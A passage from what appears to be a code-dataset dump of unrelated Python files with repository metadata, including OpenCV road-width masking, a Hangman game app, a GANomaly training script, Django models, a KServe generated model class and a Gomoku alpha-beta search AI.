line2_dist.append(max(LineString(center_line).distance(pt1), LineString(center_line).distance(pt2)))
line1_dist.append(min(LineString(center_line).distance(pt1), LineString(center_line).distance(pt2)))
line1_dist = sum(line1_dist) / len(line1_dist)
line2_dist = sum(line2_dist) / len(line2_dist)
mask1 = LineString(center_line).buffer(signal * line1_dist, cap_style=2, join_style=2, single_sided=True)
mask2 = LineString(center_line).buffer(-signal * line2_dist, cap_style=2, join_style=2, single_sided=True)
img_copy = img.copy()
mask1_buffer = list(
zip(map(int, mask1.exterior.coords.xy[0]), map(int, mask1.exterior.coords.xy[1])))
mask2_buffer = list(
zip(map(int, mask2.exterior.coords.xy[0]), map(int, mask2.exterior.coords.xy[1])))
# draw selected area
cv2.drawContours(
img_copy,
[np.array(mask1_buffer)],
-1,
(68, 140, 204),
thickness=cv2.FILLED
)
if not side:
cv2.drawContours(
img_copy,
[np.array(mask2_buffer)],
-1,
(68, 140, 204),
thickness=cv2.FILLED
)
for i in range(len(center_line[:-1])):
cv2.line(
img_copy,
tuple(map(int, center_line[i])),
tuple(map(int, center_line[i + 1])),
(0, 0, 127),
thickness=5
)
cv2.rectangle(
img_copy,
(20, 20),
(600, 100),
(255, 255, 255),
cv2.FILLED
)
cv2.putText(
img_copy,
'road length: {} m'.format(int(line_length)),
(50, 50),
cv2.FONT_HERSHEY_COMPLEX,
1,
(0, 0, 0),
thickness=2
)
cv2.putText(
img_copy,
'road width: {} m'.format(round(max(model.cluster_centers_)[0], 1)),
(50, 90),
cv2.FONT_HERSHEY_COMPLEX,
1,
(0, 0, 0),
thickness=2
)
for i in dist_labels:
color = (random.randint(0, 255), random.randint(0, 255), random.randint(0, 255))
pt1 = int(list(dist_dict.keys())[i][0])
pt2 = int(list(dist_dict.keys())[i][1])
for pt in [pt1, pt2]:
cv2.line(img_copy,
tuple(map(int, (df_segment_filter.loc[pt, 'x1'], df_segment_filter.loc[pt, 'y1']))),
tuple(map(int, (df_segment_filter.loc[pt, 'x2'], df_segment_filter.loc[pt, 'y2']))),
color,
thickness=3
)
cv2.addWeighted(
img_copy, 0.5, img, 0.5, 0, img_copy
)
img_copy = cv2.resize(img_copy, resize_size, interpolation=cv2.INTER_CUBIC)
# cv2.imwrite(mask_name, img_copy)
if show_mask:
cv2.imshow(' ', img_copy)
cv2.waitKey(0)
cv2.destroyAllWindows()
# draw mask
cv2.drawContours(
img_mask,
[np.array(mask1_buffer)],
-1,
color,
thickness=cv2.FILLED
)
if not side:
cv2.drawContours(
img_mask,
[np.array(mask2_buffer)],
-1,
color,
thickness=cv2.FILLED
)
for i in range(len(center_line[:-1])):
cv2.line(
img,
tuple(map(int, center_line[i])),
tuple(map(int, center_line[i + 1])),
(0, 0, 127),
thickness=5
)
return (mask1, round(line1_dist * resolution, 2), round(line_length, 2)) if side else \
(mask1, mask2, round(line1_dist * resolution, 2), round(line2_dist * resolution, 2),
round(line_length, 2))
def get_selected_area(signal):
selected_area = LineString(center_line).buffer(
signal * offset, cap_style=2, join_style=2, single_sided=True
).union(
LineString(center_line).buffer(-signal * 3.5 / resolution, cap_style=2, join_style=2, single_sided=True)
).difference(
boundary_area).intersection(Polygon([(0, 0), (img_width, 0), (img_width, img_height), (0, img_height)]))
selected_area1 = LineString(center_line).buffer(signal * offset, cap_style=2, join_style=2,
single_sided=True).difference(boundary_area)
return selected_area, selected_area1
if geo_info.CARTO == 4 and not geo_info.ONEWAY:
selected_area, selected_area1 = get_selected_area(1)
mask1, road_width1, road_length = get_mask(selected_area, selected_area1, '_1')
selected_area, selected_area1 = get_selected_area(-1)
mask2, road_width2, road_length = get_mask(selected_area, selected_area1, '_0', -1)
else:
selected_area = LineString(center_line).buffer(offset, cap_style=2, join_style=2).difference(
boundary_area).intersection(Polygon([(0, 0), (img_width, 0), (img_width, img_height), (0, img_height)]))
selected_area1 = LineString(center_line).buffer(offset, cap_style=2, join_style=2,
single_sided=True).difference(boundary_area)
mask1, mask2, road_width1, road_width2, road_length = get_mask(selected_area, selected_area1, '')
# write to file
if not geo_info.ONEWAY:
gdf_line.loc[line_index, 'width_1'] = road_width1
gdf_line.loc[line_index, 'width_0'] = road_width2
else:
gdf_line.loc[line_index, 'width_1'] = road_width1
gdf_line.loc[line_index, 'width_0'] = road_width2
gdf_line.loc[line_index, 'mask'] = mask1 if mask2 == default_polygon else \
mask2 if mask1 == default_polygon else mask1.union(mask2)
gdf_line.loc[line_index, 'width'] = road_width1 + road_width2
gdf_line.loc[line_index, 'length'] = road_length
cv2.addWeighted(
img_mask, 0.5, img, 0.5, 0, img_mask
)
img_mask = cv2.resize(img_mask, resize_size, interpolation=cv2.INTER_CUBIC)
cv2.imwrite(os.path.join(file_path, 'mask.png'), img_mask)
gdf_line.to_csv(geo_selected_file)
return gdf_line
if __name__ == '__main__':
main('../output/eg', 43.668581, -79.394941)
| [
"noreply@github.com"
] | noreply@github.com |
e7d0a57e61f5128144b8fba4688b78dcef94f422 | fce6b6b1d7b289caf17a71961f9b8879cfd31cbc | /app.py | d89d224d1fb053e1506d9e8edda8cd6c3f6a0e53 | [] | no_license | bigboy32/IITRoorkee-Hackathon-Project | f5c9c4e1326a2a2cfd8c0c21504d59c239e56576 | 4760113c4b9bedd4fc17f9e51aa135eeb700a4b2 | refs/heads/main | 2023-02-16T04:40:47.880885 | 2021-01-05T14:59:22 | 2021-01-05T14:59:22 | 326,495,922 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,486 | py | from indic_transliteration import sanscript
from indic_transliteration.sanscript import transliterate
import eel
import random
import string
import time
import os
import sys
import pickle
import configparser
import requests
eel.init('backend')
str2dev = lambda data: transliterate(data, sanscript.HK, sanscript.DEVANAGARI)
def getglobs():
x = pickle.load(open("glob.pkl", "rb"))
return x
def setglobs(goal, q, dq, caq):
open("glob.pkl", "wb").truncate()
pickle.dump([goal, q, dq, caq], open("glob.pkl", "wb"))
class HangmanHandler():
dq = 0
cur = open("db.txt", "r")
s = random.sample(cur.readlines(), 1)
word = random.choice(s).lower().replace("\n", "").rstrip().split(":", 1)
hint = word[1]
word = word[0]
hangman = 0
uw = []
w = string.ascii_lowercase
full_word = []
fw = []
dev_word = str2dev(word)
dev_fword = []
dev_fw = []
for item in range(len(list(word))):
full_word.append("_")
for item in range(len(list(dev_word))):
dev_fword.append("_")
def update_db(self, w):
cur = open("db.txt", "w")
print("Ok, now type the words, and i will save it in the database. Type QUIT to exit")
while True:
cur.write(w+"\n")
cur.close()
def play_game(self, guess):
char = guess
indecies = [i for i, x in enumerate(self.word) if x == char]
if indecies != []:
self.fw = list(self.full_word)
for item in indecies:
self.fw[item] = char
self.full_word = "".join(str(v) for v in self.fw)
if self.full_word == self.word:
return "FULL"
else:
self.uw.append(char)
return "HALF"
else:
self.uw.append(char)
return "BAD"
def smb_game(self, guess):
char = guess
indecies = [i for i, x in enumerate(self.dev_word) if x == char]
if indecies != []:
self.dev_fw = list(self.dev_fword)
for item in indecies:
self.fw[item] = char
self.dev_fword = "".join(str(v) for v in self.fw)
if self.dev_fword == self.dev_word:
return "FULL"
else:
self.uw.append(char)
return "HALF"
else:
self.uw.append(char)
return "BAD"
global handler_img
handler_img = [HangmanHandler(), 0]
def reset():
handler_img[0] = HangmanHandler()
'''
@eel.expose()
def start_game():
handler = handler_img[0]
eel.uiFinish()
eel.txt_hint()
eel.set_full_word("".join(str(v) + " " for v in handler.full_word))
eel.set_txt_hint(handler.hint)
handler_img[0] = handler
'''
@eel.expose()
def push():
h = handler_img[0]
burl = "https://RK3K3UG6BXQM6ZIF.anvil.app/_/private_api/7RW34ZQIM63GI2AUA6WWADJI/update_leaderboard/"
try:
tok = configparser.ConfigParser()
tok.read("config.ini")
tok = tok["push"]["token"]
except:
eel.a("Invalid Token! Please Close The Brower To Exit")
exit()
else:
burl += tok
burl += "/" + str(h.dq)
requests.get(burl)
eel.a("You can close the Browser-window")
exit()
@eel.expose()
def fwrite(tk):
with open("config.ini", "w") as f:
f.write(f"""
[push]
token={tk}
""")
@eel.expose()
def start_game():
handler = handler_img[0]
if "http" in handler.hint or "images/" in handler.hint:
eel.img_hint()
eel.set_full_word("".join(str(v) + " " for v in handler.full_word))
eel.set_pic_hint(handler.hint)
else:
eel.txt_hint()
eel.set_full_word("".join(str(v) + " " for v in handler.full_word))
eel.set_txt_hint(handler.hint)
eel.uiFinish()
eel.kpec()
@eel.expose()
def keypress(key):
handler = handler_img[0]
img = handler_img[1]
res = handler.play_game(key.lower())
eel.set_full_word("".join(str(v) + " " for v in list(handler.full_word)))
if res == "BAD":
base_url = "https://raw.githubusercontent.com/simonjsuh/Vanilla-Javascript-Hangman-Game/master/images/{}.jpg"
if img == 6:
eel.looseScreen()
eel.init_page_l()
else:
eel.updateHangman(base_url.format(str(img + 1)))
img += 1
if res == "FULL":
eel.winScreen()
eel.init_page_w()
handler.dq += 1
handler_img[1] = img
handler_img[0] = handler
@eel.expose()
def startWin():
eel.flwRain()
@eel.expose()
def smbKeypress(key):
handler = handler_img[0]
img = handler_img[1]
res = handler.smb_game(key.lower())
eel.setDeva("".join(str(v) + " " for v in list(handler.dev_fword)))
if res == "BAD":
base_url = "https://raw.githubusercontent.com/simonjsuh/Vanilla-Javascript-Hangman-Game/master/images/{}.jpg"
if img == 6:
eel.looseScreen()
eel.init_page_l()
else:
eel.updateHangman(base_url.format(str(img + 1)))
img += 1
if res == "FULL":
eel.winScreen()
eel.init_page_w()
handler_img[1] = img
handler_img[0] = handler
@eel.expose()
def set_full():
eel.set_full_word_red(handler_img[0].word)
@eel.expose()
def restart():
handler_img[1] =0
reset()
eel.reload()
@eel.expose()
def res():
eel.reopen()
try:
eel.start('main.html')
except:
pass
| [
"anantha1.coolkopf@gmail.com"
] | anantha1.coolkopf@gmail.com |
57fba70996c5020d941fdc5ac32be0f9eb38101e | e6acc3021714e47345213d13d6344e2d89d4a960 | /streamlit_analytics/__init__.py | 52fbbd335c80c4ce6d68b508bce9a1106a4d77f0 | [
"MIT"
] | permissive | napoles-uach/streamlit-analytics | 157aa7521647dbe490c75af893361aa6e0ff613b | fe5a7855889a66cf8d6f3eabf8841f5c00e9b492 | refs/heads/main | 2023-03-01T20:42:58.361148 | 2021-01-29T23:32:28 | 2021-01-29T23:32:28 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 86 | py | __version__ = "0.2.1"
from .main import track, start_tracking, stop_tracking, counts
| [
"johannes.rieke@gmail.com"
] | johannes.rieke@gmail.com |
a6d4c52e7e37fccfa1084300681c5bb04d9ed311 | 3074f3d65df6b4a539e0c3551036861ddeffa2c8 | /Lab 1/http_getter.py | f9a83ac236d6e601af3bc0b34b2324a6c40c4cfa | [] | no_license | VladCroitoru/SI-labs | 3b294aa6afad711a9c46f94d9dc785e8bae957e0 | 8f5d92acf25cfdc699eb3bd10ce0828975f239cf | refs/heads/master | 2021-09-13T09:26:16.239564 | 2018-04-27T19:12:43 | 2018-04-27T19:12:43 | 106,518,694 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 163 | py | from urllib2 import urlopen
url = 'http://agora.md/categorii/actual'
response = urlopen(url)
#data = str(response.read())
#print(data)
print(str(response.read()) | [
"noreply@github.com"
] | noreply@github.com |
2574993ffb7fa1778720fb71a93a76a1a38674a9 | 499a3bb112d4416df9fe5184107ed2798f669410 | /train.py | b60d5dc1455aaffd7a1f83cedcb8397493fa5eee | [] | no_license | KerrWu/GANomaly | 9dfa77fb63dc0e84d6088fa0a1aeca49bf4a40be | a9d5a97fb1463d686d40c30bd8590bd139010cf0 | refs/heads/master | 2020-06-22T16:59:05.118798 | 2019-07-19T12:28:07 | 2019-07-19T12:28:07 | 197,749,927 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 881 | py | """
TRAIN GANOMALY
. Example: Run the following command from the terminal.
run train.py \
--model ganomaly \
--dataset UCSD_Anomaly_Dataset/UCSDped1 \
--batchsize 32 \
--isize 256 \
--nz 512 \
--ngf 64 \
--ndf 64
"""
##
# LIBRARIES
from __future__ import print_function
from options import Options
from lib.data import load_data
from lib.model import Ganomaly
import os
os.environ["CUDA_VISIBLE_DEVICES"] = "7"
##
# def main():
""" Training
"""
##
# ARGUMENTS
opt = Options().parse()
##
# LOAD DATA
dataloader = load_data(opt)
##
# LOAD MODEL
model = Ganomaly(opt, dataloader)
##
# TRAIN MODEL
model.train()
# if __name__ == '__main__':
# main()
| [
"wz_0818@163.com"
] | wz_0818@163.com |
2cd609a30463f7c20347425e3e0629b4dc0a16a4 | 861f7ada9137bc2ee025dce11de194991dd05bde | /blog/migrations/0001_initial.py | d708ab237e0a189bd1fae35bfa2c16541ad67f00 | [] | no_license | SpiritForge/my-first-blog | 2ad582ffdebd1b651aed43e4b70e33b9a7e47ad1 | 760f1504bb0add6ed31c4094e9a761352396d1b4 | refs/heads/master | 2021-01-10T15:45:54.763763 | 2016-02-19T01:54:27 | 2016-02-19T01:54:27 | 52,053,930 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,048 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.9 on 2016-02-17 02:31
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Post',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=200)),
('text', models.TextField()),
('created_date', models.DateTimeField(default=django.utils.timezone.now)),
('published_date', models.DateTimeField(blank=True, null=True)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
]
| [
"jack.tinker@gmail.com"
] | jack.tinker@gmail.com |
820d4de9dbd33948240b4ae2add3a0af6d4424e9 | 7a48df5a4405c295eb28f8f6b5a112207c20ceda | /setup.py | 7bd61ce40cd3614969d5d0eaa3ca24a0f60136e4 | [
"BSD-2-Clause"
] | permissive | deebuls/youbot_pykdl | 86fdf20d66ae0cf8fde5a332563ebdd4f2d2b6b1 | bff0d41000e7c5c3dd1ee0dfabfbcc1a3f9152e8 | refs/heads/master | 2021-01-19T08:23:41.898014 | 2015-06-30T00:46:14 | 2015-06-30T00:46:14 | 38,256,716 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 304 | py | #!/usr/bin/env python
from distutils.core import setup
from catkin_pkg.python_setup import generate_distutils_setup
d = generate_distutils_setup()
#d['packages'] = ['youbot_pykdl', 'youbot_kdl', 'urdf_parser_py']
d['packages'] = ['youbot_pykdl', 'youbot_kdl']
d['package_dir'] = {'': 'src'}
setup(**d)
| [
"deebuls@gmail.com"
] | deebuls@gmail.com |
76eeb3e354352d6dfd8a7b6d6e3e27b30af289a5 | 43eb7f8581a8dbfa1298b4e6d84fc7b7a552e335 | /python/kserve/kserve/models/v1beta1_inference_service_status.py | f509e6bb2db9b1958db1fd812b355ccd0c7546b0 | [
"Apache-2.0"
] | permissive | Suresh-Nakkeran/kserve | c2d114f7258a70b4c8ddeb8ee8c584d4eee0f81b | d3910e0fc6af4bf73156a53bd912d6e4acc87533 | refs/heads/master | 2023-07-29T00:17:28.900100 | 2021-09-11T08:04:54 | 2021-09-11T08:04:54 | 406,243,335 | 0 | 0 | Apache-2.0 | 2021-09-14T05:59:05 | 2021-09-14T05:59:04 | null | UTF-8 | Python | false | false | 9,203 | py | # Copyright 2020 kubeflow.org.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# coding: utf-8
"""
KServe
Python SDK for KServe # noqa: E501
The version of the OpenAPI document: v0.1
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
from kserve.configuration import Configuration
class V1beta1InferenceServiceStatus(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
openapi_types = {
'address': 'KnativeAddressable',
'annotations': 'dict(str, str)',
'components': 'dict(str, V1beta1ComponentStatusSpec)',
'conditions': 'list[KnativeCondition]',
'observed_generation': 'int',
'url': 'KnativeURL'
}
attribute_map = {
'address': 'address',
'annotations': 'annotations',
'components': 'components',
'conditions': 'conditions',
'observed_generation': 'observedGeneration',
'url': 'url'
}
def __init__(self, address=None, annotations=None, components=None, conditions=None, observed_generation=None, url=None, local_vars_configuration=None): # noqa: E501
"""V1beta1InferenceServiceStatus - a model defined in OpenAPI""" # noqa: E501
if local_vars_configuration is None:
local_vars_configuration = Configuration()
self.local_vars_configuration = local_vars_configuration
self._address = None
self._annotations = None
self._components = None
self._conditions = None
self._observed_generation = None
self._url = None
self.discriminator = None
if address is not None:
self.address = address
if annotations is not None:
self.annotations = annotations
if components is not None:
self.components = components
if conditions is not None:
self.conditions = conditions
if observed_generation is not None:
self.observed_generation = observed_generation
if url is not None:
self.url = url
@property
def address(self):
"""Gets the address of this V1beta1InferenceServiceStatus. # noqa: E501
:return: The address of this V1beta1InferenceServiceStatus. # noqa: E501
:rtype: KnativeAddressable
"""
return self._address
@address.setter
def address(self, address):
"""Sets the address of this V1beta1InferenceServiceStatus.
:param address: The address of this V1beta1InferenceServiceStatus. # noqa: E501
:type: KnativeAddressable
"""
self._address = address
@property
def annotations(self):
"""Gets the annotations of this V1beta1InferenceServiceStatus. # noqa: E501
Annotations is additional Status fields for the Resource to save some additional State as well as convey more information to the user. This is roughly akin to Annotations on any k8s resource, just the reconciler conveying richer information outwards. # noqa: E501
:return: The annotations of this V1beta1InferenceServiceStatus. # noqa: E501
:rtype: dict(str, str)
"""
return self._annotations
@annotations.setter
def annotations(self, annotations):
"""Sets the annotations of this V1beta1InferenceServiceStatus.
Annotations is additional Status fields for the Resource to save some additional State as well as convey more information to the user. This is roughly akin to Annotations on any k8s resource, just the reconciler conveying richer information outwards. # noqa: E501
:param annotations: The annotations of this V1beta1InferenceServiceStatus. # noqa: E501
:type: dict(str, str)
"""
self._annotations = annotations
@property
def components(self):
"""Gets the components of this V1beta1InferenceServiceStatus. # noqa: E501
Statuses for the components of the InferenceService # noqa: E501
:return: The components of this V1beta1InferenceServiceStatus. # noqa: E501
:rtype: dict(str, V1beta1ComponentStatusSpec)
"""
return self._components
@components.setter
def components(self, components):
"""Sets the components of this V1beta1InferenceServiceStatus.
Statuses for the components of the InferenceService # noqa: E501
:param components: The components of this V1beta1InferenceServiceStatus. # noqa: E501
:type: dict(str, V1beta1ComponentStatusSpec)
"""
self._components = components
@property
def conditions(self):
"""Gets the conditions of this V1beta1InferenceServiceStatus. # noqa: E501
Conditions the latest available observations of a resource's current state. # noqa: E501
:return: The conditions of this V1beta1InferenceServiceStatus. # noqa: E501
:rtype: list[KnativeCondition]
"""
return self._conditions
@conditions.setter
def conditions(self, conditions):
"""Sets the conditions of this V1beta1InferenceServiceStatus.
Conditions the latest available observations of a resource's current state. # noqa: E501
:param conditions: The conditions of this V1beta1InferenceServiceStatus. # noqa: E501
:type: list[KnativeCondition]
"""
self._conditions = conditions
@property
def observed_generation(self):
"""Gets the observed_generation of this V1beta1InferenceServiceStatus. # noqa: E501
ObservedGeneration is the 'Generation' of the Service that was last processed by the controller. # noqa: E501
:return: The observed_generation of this V1beta1InferenceServiceStatus. # noqa: E501
:rtype: int
"""
return self._observed_generation
@observed_generation.setter
def observed_generation(self, observed_generation):
"""Sets the observed_generation of this V1beta1InferenceServiceStatus.
ObservedGeneration is the 'Generation' of the Service that was last processed by the controller. # noqa: E501
:param observed_generation: The observed_generation of this V1beta1InferenceServiceStatus. # noqa: E501
:type: int
"""
self._observed_generation = observed_generation
@property
def url(self):
"""Gets the url of this V1beta1InferenceServiceStatus. # noqa: E501
:return: The url of this V1beta1InferenceServiceStatus. # noqa: E501
:rtype: KnativeURL
"""
return self._url
@url.setter
def url(self, url):
"""Sets the url of this V1beta1InferenceServiceStatus.
:param url: The url of this V1beta1InferenceServiceStatus. # noqa: E501
:type: KnativeURL
"""
self._url = url
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, V1beta1InferenceServiceStatus):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
"""Returns true if both objects are not equal"""
if not isinstance(other, V1beta1InferenceServiceStatus):
return True
return self.to_dict() != other.to_dict()
| [
"noreply@github.com"
] | noreply@github.com |
f67834c0e802a18408ca646d581289a12ab563d3 | 898510713517c54f851d55cafb86cba7717a5419 | /contiguousArray.py | 3c4bfe410e6a109bdde4da997acf19d3703b44d5 | [] | no_license | Jill1627/lc-notes | dd871816adfdbd3b6f7a8992824277de03b7921c | af28e4070e3cab859bfcdc45aca3f31c1e3325fe | refs/heads/master | 2021-01-13T16:40:02.854268 | 2017-09-02T20:04:06 | 2017-09-02T20:04:06 | 78,187,785 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,246 | py | """
LC 525 Contiguous Array - find the maximum length of subarray that have equal amount of 0 and 1
Idea: hashmap, use -1 to represent 0, and 1 to represent 1, whenever there are equal number of 0 and 1, the sum will be 0
Steps:
1. Initialize:
use a hashmap <prefixSum : index>, prefixSum, maxLen, give the map an initial value of indexMap[0] = -1 meaning that a prefixSum = 0 has an index of -1 to start with
2. Loop:
update prefixSum, +1 if it's a 1, -1 if it's a zero
check in hm: if prefixSum already in, meaning from prev index to this index, prefixSum increment = 0, equal number of 0 and 1 is found -> update maxLen
otherwise, add it to hm
"""
class Solution(object):
def findMaxLength(self, nums):
"""
:type nums: List[int]
:rtype: int
"""
if nums is None or len(nums) == 0:
return 0
# initialize
indexMap = dict()
prefixSum = 0
maxLen = 0
indexMap[0] = -1
# loop
for i in xrange(len(nums)):
prefixSum += 1 if nums[i] == 1 else -1
if prefixSum in indexMap:
maxLen = max(maxLen, i - indexMap[prefixSum])
else:
indexMap[prefixSum] = i
return maxLen
| [
"JillGao@LEIs-MacBook.local"
] | JillGao@LEIs-MacBook.local |
c4063872a4db9b76de528e21e4ace2f7752522c7 | 8b291b1835e0ece5a151edd12d1ff6d26f3813f5 | /student/models.py | 4be944bd72975b3965d7cf36e660642d8f135b50 | [] | no_license | hanul500/yiruma | bebfa6479b191ed670dc87f80b174a67946b34de | 362f2119d78ff7beb43c58868b09c78c7b56c334 | refs/heads/master | 2022-04-28T18:45:05.230948 | 2020-04-29T10:13:27 | 2020-04-29T10:13:27 | 259,372,724 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 989 | py | from django.db import models
# Create your models here.
class Studentinfo(models.Model):
def __str__(self):
return str(self.stu_name)
stu_id = models.CharField(blank=True,null=True,max_length=120)
stu_name = models.CharField(blank=True,null=True,max_length=120)
stu_num = models.CharField(blank=True,null=True,max_length=120)
stu_category = models.CharField(blank=True,null=True,max_length=120)
stu_card = models.CharField(blank=True,null=True,max_length=120)
stu_cardbank = models.CharField(blank=True,null=True,max_length=120)
stu_validdate = models.CharField(blank=True,null=True,max_length=120)
stu_subj = models.CharField(blank=True,null=True,max_length=120)
stu_money = models.IntegerField(blank=True,null=True)
class Meta:
ordering = ['stu_name']
def make_id(self):
idlist=[]
if Studentinfo.objects.last():
for i in Studentinfo.objects.all():
idlist.append(i.stu_id[1:])
self.stu_id = "S"+ "%04d"%(int(max(idlist))+1)
else:
self.stu_id = "S0000"
| [
"hanul500@naver.com"
] | hanul500@naver.com |
9a5d27e164e9b946f450c58e1fa6c0999b915726 | a7de66f4d29c4ecf3abf35182aa6c7b5911bdbf1 | /Final_MyGomoku.py | a61f4c630a45a29981f2158b608dfee63c9a474d | [] | no_license | mengfeidu/GOMOKU-agent-with-python | fe93752219bb31abbd902f74948dd6a2405d60c0 | b153a323a28efe41d217e0b52d97b7db44432c72 | refs/heads/main | 2023-09-02T08:35:46.639576 | 2021-10-23T15:55:34 | 2021-10-23T15:55:34 | 420,104,737 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 29,518 | py | import random
import pisqpipe as pp
from pisqpipe import DEBUG_EVAL, DEBUG
import math
import copy
import time
pp.infotext = 'name="pbrain-pyrandom", author="Jan Stransky", version="1.0", country="Czech Republic", www="https://github.com/stranskyjan/pbrain-pyrandom"'
MAX_BOARD = 100
board = [[0 for i in range(MAX_BOARD)] for j in range(MAX_BOARD)]
THRESHOLD = 3
inBoundary = lambda x, y: (x >= 0 and y >= 0 and x < pp.width and y < pp.height)
# kill chess initialization
recordWin = {}
def get_zobrist(hashTable):
for i in range(pp.width):
for j in range(pp.height):
hashTable[(i, j)] = random.randint(0, 1e30)
return
AlreadyKill = False # 检测是否已杀
hashTableForP1 = {} # Zobrist for player 1
get_zobrist(hashTableForP1)
hashTableForP2 = {}
get_zobrist(hashTableForP2)
def chess2int(board):
# 将棋盘转化成一个整数
chessTable = 0
for x in range(pp.width):
for y in range(pp.height):
if board[x][y] == 0:
continue
elif board[x][y] == 1:
chessTable ^= hashTableForP1[(x, y)]
else:
chessTable ^= hashTableForP2[(x, y)]
return chessTable
def brain_init():
if pp.width < 5 or pp.height < 5:
pp.pipeOut("ERROR size of the board")
return
if pp.width > MAX_BOARD or pp.height > MAX_BOARD:
pp.pipeOut("ERROR Maximal board size is {}".format(MAX_BOARD))
return
pp.pipeOut("OK")
def brain_restart():
for x in range(pp.width):
for y in range(pp.height):
board[x][y] = 0
pp.pipeOut("OK")
def isFree(x, y):
return x >= 0 and y >= 0 and x < pp.width and y < pp.height and board[x][y] == 0
def brain_my(x, y):
if isFree(x, y):
board[x][y] = 1
else:
pp.pipeOut("ERROR my move [{},{}]".format(x, y))
def brain_opponents(x, y):
if isFree(x, y):
board[x][y] = 2
else:
pp.pipeOut("ERROR opponents's move [{},{}]".format(x, y))
def brain_block(x, y):
if isFree(x, y):
board[x][y] = 3
else:
pp.pipeOut("ERROR winning move [{},{}]".format(x, y))
def brain_takeback(x, y):
if x >= 0 and y >= 0 and x < pp.width and y < pp.height and board[x][y] != 0:
board[x][y] = 0
return 0
return 2
def brain_turn():
if pp.terminateAI:
return
i = 0
while True:
x = random.randint(0, pp.width)
y = random.randint(0, pp.height)
i += 1
if pp.terminateAI:
return
if isFree(x, y):
break
if i > 1:
pp.pipeOut("DEBUG {} coordinates didn't hit an empty field".format(i))
pp.do_mymove(x, y)
def Mybrain_turn():
begin = time.time()
newboard = [] # shrinkage
for rowindex in range(pp.width):
tmp = board[rowindex]
newboard.append(copy.deepcopy(tmp[0:pp.height]))
# 杀棋的总体效果不佳 ...... 特例时 嗖的一下 切实相当爽
# chessnum = chess2int(newboard)
# if chessnum in recordWin:
# x, y = recordWin[chessnum]
# if isFree(x, y):
# return (x, y)
#
# fkt = FKTexplore(board=board, threshold=10)
# fkt.fktSolution()
# if fkt.winChoicePosi is not None:
# x, y = fkt.winChoicePosi
# pp.do_mymove(x, y)
# return
successor = get_successors(newboard, player=1)
player = 1 # 假设是我方轮次
best_position = None
alpha0 = -20000 # 必输分数
beta0 = 10000 # 必赢分数
for position in successor:
if time.time() - begin > 14.99:
break
x1, y1 = position
newboard[x1][y1] = player
if len(successor) > 1:
tmp_value = value(depth=0, player=1, alpha=alpha0, beta=beta0, board=newboard, position=position)
else:
best_position = position
break
newboard[x1][y1] = 0 # 还原
if tmp_value >= 10000: # Win
best_position = position
break
elif tmp_value > alpha0:
best_position = position
alpha0 = tmp_value
x, y = best_position
pp.do_mymove(x, y)
def nearKsquares(K, board):
# return a list 扫一遍
NearNeighbor = dict()
allposition = 0
for x in range(pp.width):
for y in range(pp.height):
if board[x][y] == 0:
neighbor_num = 0
for x_might in range(max(x - K, 0), min(pp.width, x + K + 1)):
for y_might in range(max(y - K, 0), min(pp.height, y + K + 1)):
if board[x_might][y_might] != 0: # 可能有点偏僻
neighbor_num += 1
if neighbor_num > 0:
NearNeighbor[(x, y)] = neighbor_num
else:
allposition += 1
if len(NearNeighbor) >= 3 and allposition >= 3: # 缩小搜素范围
NearNeighbor = dict((key, value) for key, value in NearNeighbor.items() if value > 1)
NearNeighborlist = sorted(NearNeighbor.keys(), key=lambda x: NearNeighbor[x], reverse=True)
if len(NearNeighbor) == 0:
return [(int(pp.width / 2), int(pp.height / 2))]
return NearNeighborlist
def if_win(board, player, x_last, y_last):
# 遍历看四周是否能赢
# 横着的路
tmp = 0
for x in range(max(x_last - 4, 0), min(pp.width, x_last + 5)):
if board[x][y_last] == player:
tmp += 1
else:
tmp = 0
continue
if tmp == 5:
return True
# 竖着的路
tmp = 0
for y in range(max(y_last - 4, 0), min(pp.height, y_last + 5)):
if board[x_last][y] == player:
tmp += 1
else:
tmp = 0
continue
if tmp == 5:
return True
# 东北-西南
tmp = 0
for y in range(max(y_last - 4, 0), min(pp.height, y_last + 5)):
x = x_last + (y - y_last)
